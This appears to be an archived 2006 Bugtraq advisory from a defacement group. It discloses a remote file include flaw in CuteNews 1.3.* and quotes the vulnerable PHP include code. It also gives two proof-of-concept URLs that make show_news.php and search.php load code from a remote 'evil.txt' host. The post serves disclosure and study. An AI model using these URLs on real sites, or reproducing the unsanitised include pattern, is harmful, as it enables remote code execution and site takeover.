[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
CuteNews 1.3.* Remote File Include Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CuteNews 1.3.* Remote File Include Vulnerability
- From: stormhacker@xxxxxxxxxxx
- Date: 25 Aug 2006 19:14:46 -0000
Welcome people In World Defacers Team
[W]orld [D]efacers Team
======================================
--------------------Summary----------------
eVuln ID: WD22
Vendor: CuteNews 1.3.*
Vendor's Web Site: http://cutephp.com/
Software: Live Customer Support Solution :- http://www.pansionat.net/novost/
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS (worlddefacers.de)
-----------------Description---------------
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
--------------PoC/Exploit----------------------
show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)